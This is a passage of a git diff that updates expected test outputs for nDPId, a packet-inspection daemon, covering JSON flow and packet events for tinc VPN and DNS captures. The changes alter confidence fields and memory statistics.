fy8UHTu26YFArxZ++\/ysArMEP2WLqaUMI6M\/jOSF4Hmz4MDlNkXALZoCcota0mysF7b9UawKat33S4Mn95EjfrH9sP42bJhKBoemGSQoufnGy397VEaJIbjn0C4TMCdTSxnPB2Kbauhcj5J9SFESxhfdT1dCI+XOZyD+qGea1LaaQlTKnH9E\/\/jMJNmp50jvcNxKjRrVFwHpWvyCjkeewfQ5cMV0LYN7Zr0J8LPcmGWZ6HVdR8joEBR5VzTkpA484re9kkh3rmNHcG6eXJdcA="} 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1495983428027,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":238,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":238,"pkt_l4_len":204,"thread_ts_msec":1495983428027,"pkt":"ACbGCvpSABcILL3nCABFCADgAABAADERibO5U9pwg3KoG9ln2WcAzPGuM9Lx5\/tPdTG2m3Y0AlyEq2mnzqyIMEs7w8HRBEl8Y5NuT+Tl6VzNZm9syhOM8O5X9DMCZ2i18aEY5\/AFa+9vGaBzFiMm9BvXYzjoD8NIhl92KAV3hQzzPzdUGmBVVMf0BbRkDSRCiFN9nGpFLBN+y4nOpA3kBUeSofHjZl9gZY\/0gSr+qv0Gl1ZSJf+LLeeMJpEC6tb9XeO6w6224M34GMTZTkD7Nv+SCyj6hVz9obZb5coivi5CEA1BAiI84UNSuifu9w=="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428043,"flow_last_seen":1495983428043,"flow_idle_time":200000,"flow_min_l4_payload_len":724,"flow_max_l4_payload_len":724,"flow_tot_l4_payload_len":724,"flow_avg_l4_payload_len":724,"midstream":0,"thread_ts_msec":1495983428043,"l3_proto":"ip4","src_ip":"185.83.218.112","dst_ip":"131.114.168.27","src_port":55656,"dst_port":55656,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01408{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1495983428043,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":766,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":766,"pkt_l4_len":732,"thread_ts_msec":1495983428043,"pkt":"ACbGCvpSABcILL3nCABFCALwAABAADERh6O5U9pwg3KoG9lo2WgC3AOYwHfE3coRkd9vFWAurZs8jstTwnXw\/cqsx5iKbKA7woGOpEZiStAKTCSRoKp6x6\/f9Zs+BpTFgPOcyy5YAMcbffaGjwWOnT8IyeKE5n34quupOTS2uuRjCtyNCFAo8WTnSMzbi32PyJcywIUxEUQ8liTYbPgKdwTgaiP\/Hotm1mtwLDTs7hG08UqSbcXCWXNFFVPEK47MaPqwoPn2dh7mqibglI+NUfYKog17NTDVZj+waYLvcDN9j2XoImkNzUjCipW9K3ac4j70R5PFggHU36XlCSNZ2XhIjFKM00nQGI+QLoteQ8j0aZAsrLXLYsxqqK4SvGoYgma1olbSPh2W15iEFnVNfCrkhO342UfUtRpoqO2eSyqwBMxkb1F3H2m0kYUJQotA5znx3A5M2I2cLV97Zq1M5s2yfOsVLnemh3YMo8DmxGOnynqe4PdTcIIYCFlTuvlbJxcoz46oqoG4DHCRlF0dlntPGix0TitI5D\/n0YiE5bQQUU7gqIMYrd\/038O+j7JziwNwLqI9ZUNuZRL5RgmChAbYY5TtTaE7r+CtYmugTK7qdhtdAytq+kIRcuZJxzW2e+QHOyzQjzCE7aIMnqFyw73cJLJvOafzGqDIWsdusVXsa7JkhE0L2HSLACJvLruZU6SO95zxggRtnzTruoO2bZQpKHl56KP7dWrprSH\/BtWoA8QYIMdKrZ11e6dVhhfntSzlJ7oOBRzS82PQtcxITPaQUBY7kloV6nEsD123\/RYWvYnnlopmrLjY88pZllsFaRoYa+q+rxj125r8cCXiXcb20crMWSrxvWF5gSaLraJg0iySCfa0N+9TIxFXdaISLPrnQJf+KFNsm71eDJSNCihlQD114v9gJdrqDDh2zOpIECten2AFkK5gz9Y9P\/m15B6u92mwRdXwhBzI10R26F6x1VA2OCcHHQ90EjxcfGr9C9BCt8qY+zJFJYvpTw=="} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428043,"flow_last_seen":1495983428043,"flow_idle_time":200000,"flow_min_l4_payload_len":724,"flow_max_l4_payload_len":724,"flow_tot_l4_payload_len":724,"flow_avg_l4_payload_len":724,"midstream":0,"thread_ts_msec":1495983428043,"l3_proto":"ip4","src_ip":"185.83.218.112","dst_ip":"131.114.168.27","src_port":55656,"dst_port":55656,"l4_proto":"udp","ndpi": {"flow_risk": {"5": 
{"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428043,"flow_last_seen":1495983428043,"flow_idle_time":200000,"flow_min_l4_payload_len":724,"flow_max_l4_payload_len":724,"flow_tot_l4_payload_len":724,"flow_avg_l4_payload_len":724,"midstream":0,"thread_ts_msec":1495983428043,"l3_proto":"ip4","src_ip":"185.83.218.112","dst_ip":"131.114.168.27","src_port":55656,"dst_port":55656,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 02392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1495983428043,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1486,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1486,"pkt_l4_len":1452,"thread_ts_msec":1495983428043,"pkt":"ACbGCvpSABcILL3nCABFCAXAAABAADERhNO5U9pwg3KoG9lo2WgFrCCQQfVUKnrm4XUK3wfxxn8qlQ5ZlUxAsin94OmtvvCqeiNDv9hCgysXgIe\/Jwp6foEgyUgSLwbFE+jFX5EiTbzvLxw+eE+9kkIbIypcFMAA862am\/h5EhYX9oyZgZit\/ohLFdBZAd\/9piW+TIg1JYKUHUk24mSNhkzehqNGbaa8v1XNXvCAKUf+je80JL2ztiSjDNtOMrbTSNyuOyDQhbbpaRAakKCJ88rhmRVZWPpGUvSoCLUQLdy+ls4UP9VbLIv60yNlhG\/tIZF+Y9AgYJgNK7469NXCZUoHPgebmwGoSIBvEupGZ2HWMq5tD1YtSNLd5mdcZ4U6bdW57PJT8Mqpobu5nNKCEUTKU8fv54QllT27onCmdTrjSLU7i56qGCPKz8Pmgpd+4MU1sOXlteqk11G5kxvUePU9AHDMWVZcDsBw+8w6+Ab\/JxYo4ilYPsOkX7nL+VL0USjj5AuG8wFeeDnvZeQURQeN12MuZewRpRzkJa5jIqIQqHHvEIR3I+NlcYV0IJXsrpavQ6RSGtYmR7+94hoEShFxTK6D2mPtrdLiAqRfmJptPiSWL
m5Mqo0iayfkgY6sd6M1vwIpwRPc0qQOtn1doDjup9IIauyzdANQF9x2voU4Z8dsvHyVyVE9VF\/Qdb\/Bbe15\/vrLpOF+cB00\/TXrJ07AVZHqEwel\/iScs2S9kgqiIjzb1T0G6y8xlHQV7ktrErMlC4GXnRqlxWayYa4G266nN6wc0wTy9MD7G5DpqxUPZwZIrxZiMHXc4mPXA210XTsNG7LVVQM581lStiGr1a4pUZOImjoO\/gk5frgMuu6jHFgEA+vJuy5sW5lQpb37IXQqFXKKxN2z8Ke+x4zy7ALHVigelzuNCf3HZfol1uD4eeP+2tpVITMiH4O5PCcLDMT1yYFhbvLg8pREkBITQB+rUBzFhHXEVteh6noPH6hIRkDIrLyfEHdswFs6MATwSlSxKkz0QuaSV8BEXCeHOM+JmmNRCgSmcHuzwrDdDGG7eSF7kzVOXV4KPQtBdbB4rq\/rFfGJFSiBXn2huFIeNdQhj4gFtDQIfYjXMsmhSsrScwjLj7C7jg2Rwm\/XuhfLgws3rBZC6s4ClAl8Lku7gDzAWOdYgK2FafJmEnZR3NXAFEI8JF5r5ITwwBATJADMcv7GO51VLOgFAuacu5w0kk1gxapzbHcSOdPeKJB+9voPecizTzqOKMuqIngnpb\/qfLXWqnLz7U6\/\/ui4aHgWF+lKp0xsjiPYD9YnVxFJE08oruybimAl5F4KHctwad6wrnqDh7AMDE3spgEO04z6pL2VZXL\/wvq6pxHL80kORMsGZgPOmyHtPCRE5Jd+RFgmwBejwRrNJFCuLc2P622GjZ1t\/hPuud14khvjnfHdyfKsl19iLyzwv7qu0oEoiwBrYf06g7MzcULZl4XUxJNSE9RYU15rJmRxguh4eXuIOqgIqrfkbI\/\/vDyBWYyc45utTloDIm+GnDiAeigtPF4FijLPE9qVDfQilPuHMnf6UDvllbgNqo19g3gnmLroqXep+7LyRYp4sWr4\/d\/TZKaCucaaCwVm1u\/1te\/n+aOftes5xygxK+OaKehbJ47nnj4GJRcueg7KFHNq2ES0Uj1Rh2+lhguZLWYwLh4\/FPK0vdBcca9l29F4kxSaDHn6BeoZpX+wivGn5jMTbID2EPugYpELm+yXQDHU1W7JBJkdRRhJfBWIKo8UZofXK4qgL2\/MqCqF2T2\/hEjt9sAO7DVGx2T23++65+kzCDH2qiAfrQdQFlN08V17FGkydmcJibPSSbSe7aLjPjiXuGdc7ip\/LMmiTS0sCJq6zHCBk5aHilHCEqmTl+eL9Q9vwrMeAdX+cTIhD7xTxK6aeGzriTEJFQi6+ZDkO2+SfJZlZhRSLhc55JEaOH4LdN2VABhAfw=="} 
01675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1495983428043,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":958,"pkt_l4_len":924,"thread_ts_msec":1495983428043,"pkt":"ACbGCvpSABcILL3nCABFCAOwAABAADERhuO5U9pwg3KoG9lo2WgDnO+CxkvMU5czu375VqRfqLEu7HGryDGh\/bfeaQJnEYyovrmntDxt74C8PKQJMHvY4MA1ZHuHhnLJLLc7h764zEbGLw\/vzqsaP4XOJmX3J5ZoXTmAMsXnjvJUPqVeWdg0PXJhqa6st9hNynxv5D0rpJqm0\/zV192qcE59jCUVvmB8PfyMGzNb8iu7j79YvIHCzFHzmycvx5sIdKuzv+9aaD2+9O1fWAuPwq8\/8DIg8DeQB7htbL3\/j6lwDGupSOVHCsI1+lYyNr8A5\/OFujJsJCBzKGXQVn+oJRoQMsFgr0giRTOfhVQb+GlZOLXTcVvxl6mNiWSoDQXoxAfPuixrlp8F\/MUrFtVqJYJIqlWUSZ0FHJzKiXJ5yQvwNmnsvYHqMQNW6ZCn++1tGEto8r5tq\/BDe0FvMAOQC\/Iq49d9xjtHRJaZkPSuUT0Ue8\/0Y0g7e7MLBCNRDp3pFvP\/SDROeSBv+1Hrsd3VgZ3eZsdET6SE7O+jiB1npy8XRuCERu\/h5FlX8FbvbKHJP4IXbapoGYosv9tEU2XONo65wz3MCF\/bVbrUPcOASb6j+c55C5rFZMKjA9llC2lki+5ox8NX3C0rsVb9ezbzAq4pvwBxx6yeMVlmBhRxjwXLWviN6bjb8+kKUMxdeqvtFZ90hWLG3av8x5N1D1shhjp\/Pkh3vfzESwJoedvps7xxuR16c9ku4Rlje1SzPbiXWLLd2ctB3NoWHVeTFrvLRU2yqM5LNXQpjLOWYVqndimokWzm3PvfsX2+ickLKvqhiNB8NMbCQKKllVtQtaf37M0W3hxij8fNqkfQ3Dwvv36xYQY6aA2cxZJ7cAJfgWt3+2IqzsbQ\/hOa1lDnl8uliASJ4hjXOWhi4prZ86H1uoSeDR53SAlBdMQQ3YoaLSv6kQQOXAUwHuZQi7+x\/RE5HfoAvVeNzG90OcOnL2uiCxjhyp3\/swc9NGfoqhpvTPlS\/HF6E4gzQu+uwm3Kmj7AsKixik3ciIBb6VqLoyiaQR35wKSQydm3qyc2A8RxVwJEHM9ChZNid+PGF9MC3cdjsTP6IG4AOw3VS8jLQznT38vyJvgWelWwQ+I9gJ2zh8MbfaLP+EWNQPI478wMYlCsuyg5uNNDg0lSF1epToqo6+lky+h2nAa21hKOviRtVRN8LV88QPWbYJx4n3gM4sg9yVPde6y+bdl\/hYGe1J5JIAW7OGyTqN+C43dvapKXMw=="} 
-00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1495983427744,"flow_last_seen":1495983475109,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":5390,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} -00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":130,"flow_first_seen":1495983428000,"flow_last_seen":1495983470973,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":1468,"flow_tot_l4_payload_len":164056,"flow_avg_l4_payload_len":1261,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":55655,"dst_port":55655,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 
-00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":134,"flow_first_seen":1495983428043,"flow_last_seen":1495983463866,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":1468,"flow_tot_l4_payload_len":164136,"flow_avg_l4_payload_len":1224,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"185.83.218.112","dst_ip":"131.114.168.27","src_port":55656,"dst_port":55656,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1495983427717,"flow_last_seen":1495983475073,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":4647,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 
+00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1495983427744,"flow_last_seen":1495983475109,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":5390,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} +00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":130,"flow_first_seen":1495983428000,"flow_last_seen":1495983470973,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":1468,"flow_tot_l4_payload_len":164056,"flow_avg_l4_payload_len":1261,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":55655,"dst_port":55655,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 
+00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":134,"flow_first_seen":1495983428043,"flow_last_seen":1495983463866,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":1468,"flow_tot_l4_payload_len":164136,"flow_avg_l4_payload_len":1224,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"185.83.218.112","dst_ip":"131.114.168.27","src_port":55656,"dst_port":55656,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1495983427717,"flow_last_seen":1495983475073,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":4647,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 
00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","packets-captured":317,"packets-processed":317,"total-skipped-flows":0,"total-l4-payload-len":338229,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1495983475109} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 317/317 @@ -33,9 +33,9 @@ ~~ total active/idle flows...: 4/4 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5890329 bytes -~~ total memory freed........: 5890329 bytes -~~ total allocations/frees...: 118455/118455 +~~ total memory allocated....: 6019774 bytes +~~ total memory freed........: 6019774 bytes +~~ total allocations/frees...: 121215/121215 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 451 chars ~~ json string max len.......: 2397 chars diff --git a/test/results/tk.pcap.out b/test/results/tk.pcap.out index 07b729ede..fdddce8ae 100644 --- a/test/results/tk.pcap.out +++ b/test/results/tk.pcap.out 
@@ -2,22 +2,22 @@ 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tk.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1613939315029} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315029,"flow_last_seen":1613939315029,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1613939315029,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":51954,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1613939315029,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1613939315029,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA6W4cAAEARmyjAqAGywKgBAcryADUAJu9GCIYBAAABAAAAAAAABXdob2lzA2RvdAJ0awAAAQAB"} 
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315029,"flow_last_seen":1613939315029,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1613939315029,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":51954,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315029,"flow_last_seen":1613939315029,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1613939315029,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":51954,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1613939315127,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1613939315127,"pkt":"KDc3AG3IEBMx8Tl2CABFAABKKoNAADkRkxzAqAEBwKgBsgA1yvIANgAACIaBgAABAAEAAAAABXdob2lzA2RvdAJ0awAAAQABwAwAAQABAAABLAAEaJs3ng=="} -00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613939315029,"flow_last_seen":1613939315127,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1613939315127,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":51954,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.155.55.158"}} +00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613939315029,"flow_last_seen":1613939315127,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1613939315127,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":51954,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"whois.dot.tk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.155.55.158"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315127,"flow_last_seen":1613939315127,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1613939315127,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":55591,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1613939315127,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1613939315127,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA6pQMAAEARUazAqAGywKgBAdknADUAJrATOWkBAAABAAAAAAAABXdob2lzA2RvdAJ0awAAHAAB"} -00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315127,"flow_last_seen":1613939315127,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1613939315127,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":55591,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
